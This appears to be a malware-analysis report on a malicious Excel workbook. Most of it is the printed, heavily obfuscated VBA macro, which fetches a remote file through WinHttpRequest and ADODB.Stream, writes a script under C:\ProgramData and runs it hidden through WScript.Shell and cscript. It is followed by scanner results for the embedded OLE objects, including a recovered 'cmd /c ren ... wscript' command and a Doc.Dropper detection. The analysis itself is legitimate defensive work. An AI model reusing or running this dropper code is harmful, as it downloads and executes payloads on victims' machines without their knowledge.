ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    usdi4y34jh = ""Set mkdfuiqwoer843 = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    usdi4y34jh = usdi4y34jh + didtjw63jdt20" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    usdi4y34jh = usdi4y34jh + ""( """"WinHttp.WinHttpRequest.5.1"""" )""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    Execute(usdi4y34jh)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   dim stream_obj" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    ado = ""ADODB"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    ado = ado + ""."" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    ado = ado + ""Stream"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    kxpwerw894tr23 = ""set stream_obj = """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    kxpwerw894tr23 = kxpwerw894tr23 + didtjw63jdt20" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    kxpwerw894tr23 = kxpwerw894tr23 + ""(ado)""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    e1234234 = ""mkdfuiqwoer843."" + ""Open """"GET"""", gtyjnhjkfirejhrrhy, False""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    e2428354 = ""mkdfuiqwoer843."" + ""Se"" + ""nd""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    e3674343 = ""stream_obj."" + ""type = 1""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "    e4485366 = ""stream_obj."" + ""open"" 'ZZ07" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(kxpwerw894tr23 + vbCrLf + e1234234 + vbCrLf + e2428354 + vbCrLf + e3674343 + vbCrLf + e4485366)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   apapapapap11 = ""Re""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   apapapapap11 = apapapapap11 + ""spons""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(""stream_obj."" + ""write"" + "" mkdfuiqwoer843."" + apapapapap11 + ""eBody"") " + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   hji87966ryh = ""save""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   jsdkjfrre3 = ""str""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "   Execute(""stream_obj."" + hji87966ryh + ""tof"" + ""ile "" + jsdkjfrre3 + ""File"" + "", 2"")" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "End Sub" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "bfw0pw4623t3 = ""m""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "apfjebdlofe = bfw0pw4623t3 + ""data\"" + epsykevy3idfey" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "dieueehniv = ""ex""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "dieueehniv = dieueehniv + ""ec """ + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "mancan = ""vic5vuvvyerfr5g3y."" + dieueehniv + ""uiytvdverwt67fhrey""" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "uiytvdverwt67fhrey = ""C:\progra"" + apfjebdlofe" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "call xdecd(f33rZ9jPUDsN6B81P6yiLKJOeonZe6SzDGNsnxCSWrBHVHl05Pv1X2HnSigPIgPi1gXpEXCLMR9yRsmGCj3nhjVAL8Rfq4oW3eTt0EboqxgdqF, uiytvdverwt67fhrey)" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "xax = mancan" + vbLf
ppsdyfr523hrh43 = ppsdyfr523hrh43 & "vic5vuvvyerfr5g3y.run uiytvdverwt67fhrey" + vbLf


mddjekfr = "....."
weiu87yu324jhr = "b"
weiu87yu324jhr = weiu87yu324jhr + "b"
weiu87yu324jhr = weiu87yu324jhr + "b"
bieufehur3 = ""
bieufehur3 = bieufehur3 & Left(mddjekfr, 1)
bieufehur3 = bieufehur3 & "sh"

While ireu87r7r8r8ur < 50
    bieufehur3 = bieufehur3 + "ell"
    ireu87r7r8r8ur = ireu87r7r8r8ur + 100
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
        On Error Resume Next
Wend

Dim iWorksheet As Worksheet
Dim iCounter As Long

If Application.OperatingSystem Like "*Windows*" Then
    If Application.OperatingSystem Like "*Windows*" Then
        If Application.OperatingSystem Like "*Windows*" Then
            If Application.OperatingSystem Like "*Windows*" Then
                If Application.OperatingSystem Like "*Windows*" Then
                    Dim vch
                    vch = Left(weiu87yu324jhr, 1)
                    yyyyvar = "e"
                    yyyyvar = yyyyvar + " "
                End If
            End If
        End If
    End If
End If

            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"

x = "C"
x = x + ":" 'ZZ07
x = x + "\" 'ZZ07
x = x + "pr" 'ZZ07
x = x + "ogramd" 'ZZ07
x = x + "ata"
x = x + "\asc"
x = x + "."
x = x + "txt"

xxxxxpath = "Wind" + "ows\"
difudteje = "s"
difudteje = difudteje + "ys"
difudteje = difudteje + "tem"
'difudteje = difudteje + "tem"
difudteje = difudteje + "32"
d8d78du = "C:\"
hournow = Hour(Time())
If hournow < 30 Then
fgwrfguery = "."
End If
fgwrfguery = fgwrfguery + "ex"
veiure5278eu2 = d8d78du + xxxxxpath + difudteje + "\c"
veiure5278eu2 = veiure5278eu2 + "sc" + "ri" + "pt" + fgwrfguery
jkyu676ghghjki = hournow
While jkyu676ghghjki < 50
    veiure5278eu2 = veiure5278eu2 + yyyyvar
    jkyu676ghghjki = jkyu676ghghjki + 100
Wend

Dim i As Integer 'ZZ07
'ii = InputBox("Enter Value", "Enter Serial Numbers")

ajdbey84jwgw = "Scri"
ajdbey84jwgw = ajdbey84jwgw + "pti"
ajdbey84jwgw = ajdbey84jwgw + "ng."
Dim oFile As Object 'ZZ07
almvar = "v" + vch
almvar = almvar + "s"
dyekfgaioalfvgeiw = "ipt1"
bbbmap = "scr" + dyekfgaioalfvgeiw

If hournow > -2322 Then
    tycbuwetvrure = x + ":" + bbbmap + "." + almvar
End If
c5g6yhnh3jhmt4t6 = uytrgdy652t3yhegdtu
xiocyrftreubg = 2 - 1
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
            du5439menhgfe03h56wmeostfejdfswpf64medf7d = "-9482+9551*3026-2906*6579-6478*5111-5012*1036386/8858*3472-3356*501970/4970*9975-9935*489405/4661*471900/4290*745360/6655*1098513/9389*773952/6672*5785-5707*9133-9016*486467/4463*866712/8844*1273-1172*-868+982*-3344+3395*-8034+8085*-5866+5907"
 
    Open tycbuwetvrure For Output As xiocyrftreubg

b3r7w8reui43lt = hournow
If b3r7w8reui43lt < 50 Then
    While b3r7w8reui43lt < 50
        c5g6yhnh3jhmt4t6 = ppsdyfr523hrh43
        While ireu87r7r8r8ur < 50
            bieufehur3 = bieufehur3 + "ell"
            ireu87r7r8r8ur = ireu87r7r8r8ur + 100
                On Error Resume Next
                On Error Resume Next
                On Error Resume Next
                On Error Resume Next
                On Error Resume Next
                On Error Resume Next
                On Error Resume Next
        Wend
        Print #1, c5g6yhnh3jhmt4t6
        b3r7w8reui43lt = b3r7w8reui43lt + 100
    Wend
End If
b3r7w8reui43lt = hournow
While b3r7w8reui43lt < 50
          Close #1
    Dim kdhvs89dwfye6 As String
    kdhvs89dwfye6 = "W"
    minf = 50

    b3r7w8reui43lt = b3r7w8reui43lt + 100
Wend


If hournow < minf Then
    kdhvs89dwfye6 = kdhvs89dwfye6 + "Sc"
    kdhvs89dwfye6 = kdhvs89dwfye6 + "ri"
    If Application.OperatingSystem Like "*Windows*" Then
        If Application.OperatingSystem Like "*Windows*" Then
            kdhvs89dwfye6 = kdhvs89dwfye6 + "p"
            kdhvs89dwfye6 = kdhvs89dwfye6 + "t"
            kdhvs89dwfye6 = kdhvs89dwfye6 + "."
            kdhvs89dwfye6 = kdhvs89dwfye6 + "S"
            kdhvs89dwfye6 = kdhvs89dwfye6 + "h"
            kdhvs89dwfye6 = kdhvs89dwfye6 + "ell"
        End If
    End If
End If
qtsjlsgfg = 10000 - 10000

cneyowhfg43iw = False

Set cdiyrwiw28jwhw = CreateObject(kdhvs89dwfye6)
xx = cdiyrwiw28jwhw.Run(veiure5278eu2 + tycbuwetvrure, 0, False)

Dim ENVOMTBDQBKFTXD
End Sub
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject1.bin 22016 bytes
SHA-256: d467ba245981c15cf2f5c9c5dee56ac44b01840bafdcdd8b987f75e2a85a0d32
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_00_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject1.bin Ole10Native stream: Ole10Native 19177 bytes
SHA-256: 41452d9acafa4353ba5d471e5b815ffefdd77e0a5636d22c4ce4af7d595b1848
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.Shell");
ooxml_oleobject_00_ole10native_00_q ole-package-payload OOXML xl/embeddings/oleObject1.bin Ole10Native payload: display_name=q; full_path=C:\Users\ECITY\AppData\Local\Temp\q; temp_path=; def_file= 18892 bytes
SHA-256: d78db6842f750cc5c12c482358a5bae5bfe5eef1d01ad2ae97d552a6096a3de9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 shell/COM execution token(s).
ooxml_oleobject_01.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject2.bin 26624 bytes
SHA-256: c74641dd8898fbdcf047158337362dd42a19d57a9a92c897a8e9ff70a38f6033
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" 'ZZ07, WScript = sWScript + "."
ooxml_oleobject_01_ole10native_00.bin ole-package OOXML xl/embeddings/oleObject2.bin Ole10Native stream: Ole10Native 23785 bytes
SHA-256: bcc121cc26cf7d6d12fcd18b2c234f16830d3ff2f35171b012ab7ea7969478d9
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): Wscript.ScriptFullName, WScript = "WScript" 'ZZ07, WScript = sWScript + "."
ooxml_oleobject_01_ole10native_00_xx ole-package-payload OOXML xl/embeddings/oleObject2.bin Ole10Native payload: display_name=xx; full_path=C:\Users\ECITY\AppData\Local\Temp\xx; temp_path=; def_file= 23491 bytes
SHA-256: 13ea71d15b9528e5bebf8bd727b70166405d2d98c54487ad26d855e30e64034e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
ooxml_oleobject_02.bin ooxml-ole-object OOXML embedded OLE part: xl/embeddings/oleObject3.bin 5936 bytes
SHA-256: d5d48b4c730e3fbcabadcd4005104fca0c9e1116c4b4e1a4a357f943d07a5862
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Static shellcode analysis recovered command string(s): cMd /C REn %tmp%\q v& WsCrIpT %tmp%\v?..wsf  C
ooxml_oleobject_03.bin ooxml-ole-object OOXML embedded OLE part: xl/vbaProject.bin 62464 bytes
SHA-256: fdb613e7c6431eb9afcbc155ee066501271af420c59f7db1c3b128d43f79be8d
Detection
ClamAV: Doc.Dropper.Detected-9977031-0
Obfuscation or payload: unlikely
emf_00.emf ooxml-emf OOXML EMF part: xl/media/image1.emf 4968 bytes
SHA-256: 979dde2aed02f077c16ae53546c6df9eed40e8386d6db6fc36aee9f966d2cb82
emf_01.emf ooxml-emf OOXML EMF part: xl/media/image2.emf 1536 bytes
SHA-256: 4d4d1e7b04c99dcb8e885915068ad6f74cc2333e91580cdae5ccaa00c427247f

Open this report in the interactive analyzer, or submit your own file for analysis.